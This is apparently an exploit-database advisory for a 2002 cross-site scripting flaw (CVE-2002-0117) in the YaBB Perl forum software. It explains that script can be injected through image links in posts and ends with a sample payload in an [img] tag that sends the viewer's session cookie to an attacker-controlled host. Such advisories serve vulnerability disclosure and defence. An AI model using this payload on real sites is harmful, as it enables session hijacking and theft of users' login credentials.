YaBB 9.1.2000 - Cross-Agent Scripting

Author: Obscure
type: webapps
platform: cgi
port: 
date_added: 2002-01-09  
date_updated: 2012-09-09  
verified: 1  
codes: CVE-2002-0117;OSVDB-2019  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21208.txt  
source: https://www.securityfocus.com/bid/3828/info

YaBB (Yet Another Bulletin Board) is freely available web forums/community software that is written in Perl. YaBB will run on most Unix/Linux variants, MacOS, and Microsoft Windows 9x/ME/NT/2000/XP platforms.

YaBB is prone to cross-agent scripting attacks via the insertion of HTML tags into image links in messages. Due to insufficient input validation, it is possible to insert arbitrary script code in forum messages/replies. The malicious script code will be executed in the browser of the user viewing the message, in the context of the site running YaBB.

This makes it possible for a malicious user to post a message which is capable of stealing another legitimate user's cookie-based authentication credentials.

[img]javascript:document.write
('&#x3cimg
src=http://attackerssite/tools/cookie.plx?cookie='+escape(docu
ment.cookie)+'&#x3e')
[/img]